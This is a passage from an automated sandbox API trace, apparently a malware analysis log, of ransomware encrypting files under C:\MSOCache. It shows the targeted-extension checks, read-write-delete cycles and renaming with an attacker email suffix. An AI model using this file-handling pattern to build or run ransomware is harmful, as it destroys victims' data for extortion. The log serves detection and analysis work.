liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.671] WriteFile (in: hFile=0x1b0, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x306fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0047.685] SetEndOfFile (hFile=0x1b0) returned 1 [0047.686] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fe70d0 [0047.689] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.689] WriteFile (in: hFile=0x1b0, lpBuffer=0x3fe70d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70d0*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.690] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.690] WriteFile (in: hFile=0x1b0, lpBuffer=0x3fe70d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70d0*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.691] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0x306fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.691] WriteFile (in: hFile=0x1b0, lpBuffer=0x3fe70d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x306fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70d0*, lpNumberOfBytesWritten=0x306fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.693] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0047.693] CloseHandle (hObject=0x1b0) returned 1 [0047.693] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0047.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.693] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.693] lstrlenW (lpString=".doc") returned 4 [0047.693] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0047.693] lstrlenW (lpString=".docx") returned 5 [0047.693] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0047.693] lstrlenW (lpString=".pdf") returned 4 [0047.693] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0047.693] lstrlenW (lpString=".xls") returned 4 [0047.693] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0047.693] lstrlenW (lpString=".xlsx") returned 5 [0047.693] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0047.693] lstrlenW (lpString=".ppt") returned 4 [0047.693] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0047.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.694] lstrlenW (lpString=".zip") returned 4 [0047.694] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0047.694] lstrlenW (lpString=".rar") returned 4 [0047.694] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0047.694] lstrlenW (lpString=".bz2") returned 4 [0047.694] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0047.694] lstrlenW (lpString=".7z") returned 3 [0047.694] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0047.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.694] lstrlenW (lpString=".dbf") returned 4 [0047.694] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0047.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.694] lstrlenW (lpString=".1cd") returned 4 [0047.694] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0047.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.694] lstrlenW (lpString=".jpg") returned 4 [0047.694] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0047.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.694] lstrlenW (lpString=".doc") returned 4 [0047.694] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0047.694] lstrlenW (lpString=".docx") returned 5 [0047.694] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0047.694] lstrlenW (lpString=".pdf") returned 4 [0047.694] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0047.694] lstrlenW (lpString=".xls") returned 4 [0047.694] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0047.694] lstrlenW (lpString=".xlsx") returned 5 [0047.694] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0047.694] lstrlenW (lpString=".ppt") returned 4 [0047.694] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0047.694] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.694] lstrlenW (lpString=".zip") returned 4 [0047.694] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0047.694] lstrlenW (lpString=".rar") returned 4 [0047.695] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0047.695] lstrlenW (lpString=".bz2") returned 4 [0047.695] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0047.695] lstrlenW (lpString=".7z") returned 3 [0047.695] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0047.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.695] lstrlenW (lpString=".dbf") returned 4 [0047.695] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0047.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.695] lstrlenW (lpString=".1cd") returned 4 [0047.695] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0047.695] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.695] lstrlenW (lpString=".jpg") returned 4 [0047.695] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0047.695] lstrcmpiW (lpString1=".MST", lpString2=".USA") returned -1 [0047.695] lstrlenW (lpString="ShellUI.MST") returned 11 [0047.695] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0047.695] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=3584) returned 1 [0047.695] CloseHandle (hObject=0x1b0) returned 1 [0047.695] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 0x2020 [0047.695] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.696] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0047.696] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.696] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.696] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0047.696] GetLastError () returned 0x0 [0047.696] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0xe00, lpOverlapped=0x0) returned 1 [0048.334] WriteFile (in: hFile=0x1b4, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xe10, lpOverlapped=0x0) returned 1 [0048.334] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.334] WriteFile (in: hFile=0x1b4, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.335] SetEndOfFile (hFile=0x1b4) returned 1 [0048.335] CloseHandle (hObject=0x1b4) returned 1 [0048.335] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.335] SetEndOfFile (hFile=0x1b0) returned 1 [0048.336] CloseHandle (hObject=0x1b0) returned 1 [0048.336] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0048.336] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 1 [0048.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0048.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0048.336] lstrlenW (lpString=".doc") returned 4 [0048.336] lstrcmpiW (lpString1=".doc", lpString2=".MST") returned -1 [0048.336] lstrlenW (lpString=".docx") returned 5 [0048.336] lstrcmpiW (lpString1=".docx", lpString2="I.MST") returned -1 [0048.336] lstrlenW (lpString=".pdf") returned 4 [0048.336] lstrcmpiW (lpString1=".pdf", lpString2=".MST") returned 1 [0048.336] lstrlenW (lpString=".xls") returned 4 [0048.336] lstrcmpiW (lpString1=".xls", lpString2=".MST") returned 1 [0048.336] lstrlenW (lpString=".xlsx") returned 5 [0048.336] lstrcmpiW (lpString1=".xlsx", lpString2="I.MST") returned -1 [0048.336] lstrlenW (lpString=".ppt") returned 4 [0048.336] lstrcmpiW (lpString1=".ppt", lpString2=".MST") returned 1 [0048.336] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0048.337] lstrlenW (lpString=".zip") returned 4 [0048.337] lstrcmpiW (lpString1=".zip", lpString2=".MST") returned 1 [0048.337] lstrlenW (lpString=".rar") returned 4 [0048.337] lstrcmpiW (lpString1=".rar", lpString2=".MST") returned 1 [0048.337] lstrlenW (lpString=".bz2") returned 4 [0048.337] lstrcmpiW (lpString1=".bz2", lpString2=".MST") returned -1 [0048.337] lstrlenW (lpString=".7z") returned 3 [0048.337] lstrcmpiW (lpString1=".7z", lpString2="MST") returned -1 [0048.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0048.337] lstrlenW (lpString=".dbf") returned 4 [0048.337] lstrcmpiW (lpString1=".dbf", lpString2=".MST") returned -1 [0048.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0048.337] lstrlenW (lpString=".1cd") returned 4 [0048.337] lstrcmpiW (lpString1=".1cd", lpString2=".MST") returned -1 [0048.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0048.337] lstrlenW (lpString=".jpg") returned 4 [0048.337] lstrcmpiW (lpString1=".jpg", lpString2=".MST") returned -1 [0048.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0048.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0048.337] lstrlenW (lpString=".doc") returned 4 [0048.337] lstrcmpiW (lpString1=".doc", lpString2=".MST") returned -1 [0048.337] lstrlenW (lpString=".docx") returned 5 [0048.337] lstrcmpiW (lpString1=".docx", lpString2="I.MST") returned -1 [0048.337] lstrlenW (lpString=".pdf") returned 4 [0048.337] lstrcmpiW (lpString1=".pdf", lpString2=".MST") returned 1 [0048.337] lstrlenW (lpString=".xls") returned 4 [0048.337] lstrcmpiW (lpString1=".xls", lpString2=".MST") returned 1 [0048.337] lstrlenW (lpString=".xlsx") returned 5 [0048.337] lstrcmpiW (lpString1=".xlsx", lpString2="I.MST") returned -1 [0048.337] lstrlenW (lpString=".ppt") returned 4 [0048.337] lstrcmpiW (lpString1=".ppt", lpString2=".MST") returned 1 [0048.337] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0048.337] lstrlenW (lpString=".zip") returned 4 [0048.337] lstrcmpiW (lpString1=".zip", lpString2=".MST") returned 1 [0048.337] lstrlenW (lpString=".rar") returned 4 [0048.338] lstrcmpiW (lpString1=".rar", lpString2=".MST") returned 1 [0048.338] lstrlenW (lpString=".bz2") returned 4 [0048.338] lstrcmpiW (lpString1=".bz2", lpString2=".MST") returned -1 [0048.338] lstrlenW (lpString=".7z") returned 3 [0048.338] lstrcmpiW (lpString1=".7z", lpString2="MST") returned -1 [0048.338] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0048.338] lstrlenW (lpString=".dbf") returned 4 [0048.338] lstrcmpiW (lpString1=".dbf", lpString2=".MST") returned -1 [0048.338] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0048.338] lstrlenW (lpString=".1cd") returned 4 [0048.338] lstrcmpiW (lpString1=".1cd", lpString2=".MST") returned -1 [0048.338] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0048.338] lstrlenW (lpString=".jpg") returned 4 [0048.338] lstrcmpiW (lpString1=".jpg", lpString2=".MST") returned -1 [0048.338] lstrcmpiW (lpString1=".exe", lpString2=".USA") returned -1 [0048.338] lstrlenW (lpString="ose.exe") returned 7 [0048.338] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.338] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=174440) returned 1 [0048.338] CloseHandle (hObject=0x1b0) returned 1 [0048.338] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0048.339] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.339] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.339] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.339] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.339] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0048.339] GetLastError () returned 0x0 [0048.339] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x2a968, lpOverlapped=0x0) returned 1 [0048.343] WriteFile (in: hFile=0x1b4, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0x2a970, lpOverlapped=0x0) returned 1 [0048.346] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ab0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x306fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesRead=0x306fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.346] WriteFile (in: hFile=0x1b4, lpBuffer=0x3ab0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x306fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ab0020*, lpNumberOfBytesWritten=0x306fc9c*=0xe2, lpOverlapped=0x0) returned 1 [0048.346] SetEndOfFile (hFile=0x1b4) returned 1 [0048.346] CloseHandle (hObject=0x1b4) returned 1 [0048.347] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x306fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.347] SetEndOfFile (hFile=0x1b0) returned 1 [0048.348] CloseHandle (hObject=0x1b0) returned 1 [0048.348] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0048.348] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0048.349] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.349] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.349] lstrlenW (lpString=".doc") returned 4 [0048.349] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.349] lstrlenW (lpString=".docx") returned 5 [0048.349] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0048.349] lstrlenW (lpString=".pdf") returned 4 [0048.349] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.349] lstrlenW (lpString=".xls") returned 4 [0048.349] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.349] lstrlenW (lpString=".xlsx") returned 5 [0048.349] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0048.349] lstrlenW (lpString=".ppt") returned 4 [0048.349] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.349] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.349] lstrlenW (lpString=".zip") returned 4 [0048.349] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.349] lstrlenW (lpString=".rar") returned 4 [0048.349] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.349] lstrlenW (lpString=".bz2") returned 4 [0048.349] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.349] lstrlenW (lpString=".7z") returned 3 [0048.349] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.349] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.349] lstrlenW (lpString=".dbf") returned 4 [0048.349] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.349] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.349] lstrlenW (lpString=".1cd") returned 4 [0048.349] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.349] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.349] lstrlenW (lpString=".jpg") returned 4 [0048.349] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.350] lstrlenW (lpString=".doc") returned 4 [0048.350] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0048.350] lstrlenW (lpString=".docx") returned 5 [0048.350] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0048.350] lstrlenW (lpString=".pdf") returned 4 [0048.350] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0048.350] lstrlenW (lpString=".xls") returned 4 [0048.350] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0048.350] lstrlenW (lpString=".xlsx") returned 5 [0048.350] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0048.350] lstrlenW (lpString=".ppt") returned 4 [0048.350] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0048.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.350] lstrlenW (lpString=".zip") returned 4 [0048.350] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0048.350] lstrlenW (lpString=".rar") returned 4 [0048.350] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0048.350] lstrlenW (lpString=".bz2") returned 4 [0048.350] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0048.350] lstrlenW (lpString=".7z") returned 3 [0048.350] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0048.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.350] lstrlenW (lpString=".dbf") returned 4 [0048.350] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0048.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.350] lstrlenW (lpString=".1cd") returned 4 [0048.350] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0048.350] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 70 [0048.350] lstrlenW (lpString=".jpg") returned 4 [0048.350] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0048.350] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0048.351] lstrlenW (lpString="osetup.dll") returned 10 [0048.351] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0048.351] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x306ff1c | out: lpFileSize=0x306ff1c*=7378792) returned 1 [0048.351] CloseHandle (hObject=0x1b0) returned 1 [0048.351] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0048.351] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0048.351] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0048.354] CreateFileW (lpFileName="C:\\MSOCache\\All 